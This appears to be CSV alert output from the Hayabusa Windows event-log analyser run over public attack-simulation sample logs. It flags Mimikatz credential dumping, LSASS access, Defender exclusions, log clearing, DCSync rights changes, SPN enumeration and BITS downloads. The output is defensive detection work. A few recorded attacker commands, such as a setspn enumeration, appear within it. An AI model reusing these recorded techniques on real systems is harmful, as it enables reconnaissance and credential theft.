2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:01.651 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimikatz.exe : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:43.010 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:44.271 +09:00,WIN10-client01.offsec.lan,1117,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Threat Detected,,rules/sigma/other/windefend/win_defender_threat.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Windows Defender Alert,Threat: HackTool:Win32/Mimikatz.D : Severity: High : Type: Tool : User: OFFSEC\admmig : Path: file:_C:\Users\admmig\Documents\mimikatz.exe : Process: C:\Windows\explorer.exe,rules/hayabusa/default/alerts/WindowsDefender/1116_Multiple_WindowsDefenderAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-11 21:28:44.317 +09:00,WIN10-client01.offsec.lan,1116,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/Antivirus/ID1116-1117-Defender threat detected.evtx
2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx
2020-12-16 00:00:15.695 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_remote_task_src_powershell.evtx
2020-12-16 17:44:06.473 +09:00,WIN10-client01.offsec.lan,5007,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
2020-12-16 17:44:06.473 +09:00,WIN10-client01.offsec.lan,5007,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
2020-12-16 17:44:27.222 +09:00,WIN10-client01.offsec.lan,5007,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
2020-12-16 17:44:51.331 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
2020-12-16 17:45:04.144 +09:00,WIN10-client01.offsec.lan,5007,medium,Windows Defender Exclusions Added,,rules/sigma/other/windefend/win_defender_exclusions.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID5007-Defender threat exclusion (native).evtx
2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe"" ""C:\Users\bouss\source\repos\blabla\blabla.sln""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:13.690 +09:00,LAPTOP-JU4M3I0E,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:13.978 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd : Path: C:\Windows\SysWOW64\cmd.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: powershell.exe start-process notepad.exe : Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:14.296 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\SysWOW64\notepad.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: powershell.exe start-process notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:14.428 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp"" : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:14.456 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\cl.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-01-26 22:21:14.667 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\VCTIP.EXE"" : Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\vctip.exe : User: LAPTOP-JU4M3I0E\bouss : Parent Command: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features : Command: setspn -T offsec -Q */* : Path: C:\Windows\System32\setspn.exe : User: OFFSEC\admmig : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx
2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,medium,Possible SPN Enumeration,,rules/sigma/process_creation/win_spn_enum.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx
2021-02-03 00:37:59.991 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx
2021-02-03 00:37:59.993 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx
2021-02-03 00:38:31.989 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx
2021-02-03 00:38:31.995 +09:00,fs02.offsec.lan,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-Time changed.evtx
2021-02-08 21:03:02.776 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-User set with reversible psw encryption.evtx
2021-02-08 21:06:15.608 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Use only Kerberos DES encryption types.evtx
2021-02-08 21:06:53.407 +09:00,rootdc1.offsec.lan,4738,high,Weak Encryption Enabled and Kerberoast,,rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Do not require Kerberos preauthentication.evtx
2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx
2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx
2021-02-23 07:35:11.993 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx
2021-02-23 07:35:20.786 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx
2021-02-23 08:07:21.231 +09:00,jump01.offsec.lan,59,informational,Bits Job Creation,Job Title: hackingarticles : URL: https://www.ma-neobanque.com/wp-content/uploads/2020/11/carte-max-premium.jpg,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID3-59-60-BITS job created.evtx
2021-03-16 03:49:21.017 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 03:49:23.184 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: ab170ec9.png : URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 03:52:31.347 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eBRSG.img?w=100&h=100&m=6&tilesize=medium&x=1788&y=885&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 03:52:33.804 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 03:53:18.009 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 03:53:51.796 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eC0p1.img?w=100&h=100&m=6&tilesize=medium&x=1964&y=1240&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 03:53:52.751 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 03:54:15.647 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: efc1a28b.png : URL: https://i.imgur.com/IFpvPlt.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 03:55:38.049 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{259DDBBE-DDD3-4590-8A2C-60211631093C}-GoogleUpdateSetup.exe : URL: http://r5---sn-5hnedn7l.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=213.127.64.248&mm=28&mn=sn-5hnedn7l&ms=nvh&mt=1615834104&mv=m&mvi=5&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-16 04:01:32.985 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{F1502BD5-ADFF-4123-9C07-0E4B02FCB037}-89.0.4389.82_87.0.4280.66_chrome_updater.exe : URL: http://r1---sn-5hne6nlr.gvt1.com/edgedl/release2/chrome/AKGnpidu3x0C0gtuxw-XHRQ_89.0.4389.82/89.0.4389.82_87.0.4280.66_chrome_updater.exe?cms_redirect=yes&mh=rx&mip=213.127.64.248&mm=28&mn=sn-5hne6nlr&ms=nvh&mt=1615834584&mv=m&mvi=1&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx
2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx
2021-03-27 01:17:29.210 +09:00,jump01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,Credential Dumping Tools Service Execution,,rules/sigma/builtin/security/win_security_mal_creddumper.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
2021-03-27 01:36:00.106 +09:00,jump01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4658,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4658,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
2021-03-27 01:59:24.880 +09:00,rootdc1.offsec.lan,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx
